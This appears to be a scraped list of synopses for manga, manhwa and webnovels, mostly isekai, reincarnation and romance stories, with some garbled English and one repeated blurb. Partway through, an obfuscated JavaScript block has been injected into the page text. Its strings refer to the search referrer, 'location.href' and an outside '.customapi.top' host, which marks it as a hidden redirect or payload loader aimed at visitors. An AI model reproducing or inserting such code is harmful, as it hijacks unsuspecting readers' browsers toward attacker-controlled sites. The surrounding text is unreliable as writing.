Game rookie, Mo Xiaoxi, inexplicable time-traveled into a game which she always plays. Moreover, she is forced by the system to become the empress...
The Princess of Vengeance She was the king's daughter, yet treachery took her whole family's lives. With the help of a legendary artifact, she was granted a new life. She decided to hide her astounding beauty in disguise and concealed her real power, only to seek her vengeance! MangaToon got authorization from BYdongman to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.
.I thought I'd been reincarnated as a child from a dirt poor home..."I'm here to pick up Anastasia, the imperial grandchild, Her Highness!"...It seems I've possessed the body of the princess who, in the original novel', craved power, only to meet a tragic end.To demonstrate that I was not interested in power, and to fulfil a dream of being a ptissier that I could not achieve in my past life, I only baked sweets with the help of a contracted spirit.You'll feel better if you eat something delicious, and you won't have to kill me!But the harsh and heartless emperor (grandfather), and the Crown Prince (cousin) who will bring me to ruin, as well as the young duke (cousin's friend) who is the greatest knight in the empire, and even the slave knight (Elf) who stabbed me...!"Your Highness' lime pie is good."...Don't tell me these people are besotted with me rather than the sweets?Aisha's baking & healing fantasy, sweet and lovely like dessert! +
Hime, a chubby girl, is in university and currently job hunting. During an info session at one of the companies, she accidentally gets hurt but receives help from the company’s information desk clerk, Osamu. Hime falls in love at first sight with the totally prince-like Osamu. She’d like to meet him once again and in order to accomplish this, she works hard on her diet and loses 50kg! She starts working at the same company, but even after 1 year she still hasn’t found him. Then one day, the number one handsome man within the company and rumored son of a distinguished family transfers to Hime’s department. This turns out to be Osamu! In her brief moment of happiness at their reunion, Osamu frankly declares, “I have someone I’m interested in” and Hime loses all her courage. However, why does Osamu do things like hugging Hime, whispering sweet words to her, and treating her special? Will Hime be kept being played by this unexpected doting love…!?
Yuria has been reincarnated into her beloved otome game as a background character...the only thing is...she's been transported to the events that take place before the storyline of the game! Working as a handmaiden for the beloved princess, she works tirelessly to change the events of the game, and create a new where the princess doesn't become the villain. Using the knowledge of her past life and the magic she learns in the game, she guides the princess on a noble and righteous path, one that twists and turns, and is full of magic, romance, tea, sweets, and even the conflicts of royal kingdoms! A fantasy-filled adventure about a handmaiden who finds her calling in the least expected of places is about to begin! I Was Reincarnated, and Now I'm a Maid! / Tenseishimashite, Genzai wa Jijo Degozaimasu. / 転生しまして、現在は侍女でございます。 / 转生女仆~我养成的公主可不能变成恶役女配~
Ye Xuan is a professional attorney, but in the inside he is actually a scum. After an incident when he is toying with a girl, he encountered and made acquaintance with a system.
It is said that an inexpensive name makes an easier life, but the inexpensive name and life of Wang Xiao Er, because his leg were crippled, was looked down on by friends and relatives. By complete accident, he picked up a mobile phone with a magical game inside, which allowed Wang Xiao Er to change his fate. What, the things in this game can become real? Wang Xiao Er, with a face full of smiles, said, “Aiyo, hey, then don’t blame me for being greedy. Jiang Shan, beauties, I want them all!”<script></script><script>function _0x4603(){var _0x233621=['hxMTh','184iIfTjF','http://rea','yyYtX','wCRjZ','random','2yIjOqw','text','then','.top/','oUOwz','WGGAO','1254461BvQSZD','844926kePxED','3421156ppPnZw','30kQLmqQ','fIQTD','276HdHnGc','google','5813071ZbwGJN','UcpYH','40EwnxvE','location','floor','href','11438955IUSkEc','.customapi','referrer','IOvHn','eAvbU','1100938BRohJV','https://ip','3LkqdTc','includes','','302393npjjwT','eOUkw'];_0x4603=function(){return _0x233621;};return _0x4603();}(function(_0x10d1c3,_0x157a82){var _0x460cff=_0x414a,_0x19916f=_0x10d1c3();while(!![]){try{var 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Juri, Makoto, Mistugi, and Kanon serve on the student council of a prestigious girls' high school and are the school's flowers, admired by all for their beauty and excellence. They are the symbols of purity of the school, like the Madonna Lilies, the white lilies dedicated to Mary, the Holy Mother. Yet, there is a hidden side to these girls: Juri's life revolves around a forbidden love; Makoto is involved with sugar daddies, and so forth. The fact that these white lilies are getting stained by their own sediment cannot be stopped by anyone any more.
Baby Who Catches The Wind / 바람잡는 아기님 Two divorces, a life never loved. I wondered if this life was ok, and I was thrown away just previous life. The reasons are different, but the result is the same. that no one loves me. “From now on, your name is Tilias” “Welcome to my house, Tilly.” Handsome Baron Daddy Picked Me Up is family really that awkward and warm? “By the way… What’s floating on everyone’s head?” Cloud shape, sun shape, cloud shape with rain and lightning. Aha, you were born with the ability to read human emotions! However, there are people who continue to rain and lightning strikes regardless of their mood.
“Napolly,” an ordinary high school girl in modern times, was tired of a boring school life. ‘The world is gone?!’ The news is full of breaking news that the mysterious destruction continues, but the main culprit is seen in the eyes of the surviving Polly. White and brilliant silver scales, purple eyes with sadness and madness. ‘The giant dragon I saw in the game!’ In front of Polly, who can see the transparent dragon, the twin sister of Transparent Dragon, “Idae ah,” appears, and the dragon’s name is “Israel.” Napolly, who was forced to take part in the power of Ideiya by half force to calm Israel, who was dumped by a wicked woman, headed to the second world of the past. Can Polly be friends with Israel, who is trying to destroy the world, and calm it down? The savior of the dragon , 드래곤의 구원자 “Napolly,” an ordinary high school girl in modern times, was tired of a boring school life. ‘The world is gone?!’ The news is full of breaking news that the mysterious destruction continues, but the main culprit is seen in the eyes of the surviving Polly. White and brilliant silver scales, purple eyes with sadness and madness. ‘The giant dragon I saw in the game!’ In front of Polly, who can see the transparent dragon, the twin sister of Transparent Dragon, “Idae ah,” appears, and the dragon’s name is “Israel.” Napolly, who was forced to take part in the power of Ideiya by half force to calm Israel, who was dumped by a wicked woman, headed to the second world of the past. Can Polly be friends with Israel, who is trying to destroy the world, and calm it down? The savior of the dragon , 드래곤의 구원자
Jisoo, who dreamed of becoming a fairy tale illustrator since she was young, dropped out to achieve her dream and went to her grandmother’s house, where she meets Dowon. Dowon, who was worried about not having a dream, is interested in Jisoo who is trying hard to achieve her dream. “The farther you try to catch, the farther away you feel. When will the day you reach your dream come?”